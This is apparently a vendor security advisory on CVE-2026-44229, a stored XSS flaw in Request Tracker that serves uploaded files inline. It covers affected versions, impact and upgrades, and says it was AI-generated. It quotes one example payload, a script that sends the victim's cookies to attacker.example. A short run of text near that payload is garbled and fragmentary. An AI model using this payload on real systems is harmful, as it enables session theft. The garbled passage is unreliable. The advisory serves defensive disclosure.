
PEACH
Un cadre d’isolation des locataires
CVE-2026-44229 is a stored Cross-Site Scripting (XSS) vulnerability in Best Practical's RT (Request Tracker), an open-source enterprise issue and ticket tracking system. The flaw exists because uploaded content is served inline by the browser rather than forced as an attachment download, allowing an authenticated attacker to embed malicious JavaScript in uploaded files that executes in the browser sessions of other RT users who view or download the content. Affected versions include RT 5.0.0 through 5.0.9 and RT 6.0.0 through 6.0.2; fixed versions are 5.0.10 and 6.0.3. The vulnerability was published on May 20, 2026, and carries a CVSS v3.1 base score of 5.4 (Medium) (GitHub Advisory, Red Hat Bugzilla).
The root cause is improper neutralization of user-supplied input during web page generation (CWE-79), specifically the failure to set appropriate Content-Disposition: attachment headers when serving user-uploaded files. Instead, RT serves uploaded content inline, allowing browsers to render HTML or execute JavaScript embedded within uploaded files. An authenticated user with upload permissions can craft a file containing a malicious JavaScript payload; when any other RT user subsequently views or attempts to download that file, the script executes in their browser session within the RT application's origin. No public proof-of-concept code has been identified (GitHub Advisory, Red Hat Bugzilla).
Successful exploitation allows an attacker to execute arbitrary JavaScript in the browser sessions of other RT users, including administrators, who view or download the malicious upload. This can lead to session token theft, credential harvesting, unauthorized actions performed on behalf of the victim, and potential account takeover within the RT instance. Confidentiality and integrity are both impacted at a low level per the CVSS assessment, with no direct availability impact; however, session compromise of privileged users could enable broader access to sensitive ticket data and administrative functions (GitHub Advisory).
<script>document.location='https://attacker.example/steal?c='+document.cookie;</script>, designed to exfiltrate session cookies or perform actions on behalf of the victim.text/html) for user-uploaded files rather than application/octet-stream with Content-Disposition: attachment.<script> tags or obfuscated JavaScript payloads.The primary remediation is to upgrade RT to version 5.0.10 (for the 5.0.x branch) or 6.0.3 (for the 6.0.x branch), both of which fix this vulnerability by ensuring uploaded content is served with appropriate Content-Disposition: attachment headers. As an interim workaround, administrators can enable the AlwaysDownloadAttachments configuration option in RT to force all uploaded content to be downloaded rather than rendered inline. Additionally, restricting file upload permissions to trusted users only reduces the attack surface. Implementing Content Security Policy (CSP) headers can provide an additional layer of defense against XSS execution (GitHub Advisory, RT 6.0.3 Release).
The vulnerability was disclosed as part of a broader RT 6.0.3 security release on May 20, 2026, which addressed multiple security issues including SQL injection, LDAP authentication bypass, CSRF, and several XSS variants. Red Hat tracked the issue via Bugzilla and the Ubuntu security team issued advisory USN-8506-1 addressing the vulnerability in their packaged versions of RT. No notable independent researcher commentary or significant social media discussion has been identified beyond standard vulnerability aggregator coverage (RT 6.0.3 Release, Red Hat Bugzilla).
Source: Ce rapport a été généré à l’aide de l’IA
Évaluation gratuite des vulnérabilités
Évaluez vos pratiques de sécurité cloud dans 9 domaines de sécurité pour évaluer votre niveau de risque et identifier les failles dans vos défenses.
Obtenez une démo personnalisée
"La meilleure expérience utilisateur que j’ai jamais vue, offre une visibilité totale sur les workloads cloud."
"Wiz fournit une interface unique pour voir ce qui se passe dans nos environnements cloud."
"Nous savons que si Wiz identifie quelque chose comme critique, c’est qu’il l’est réellement."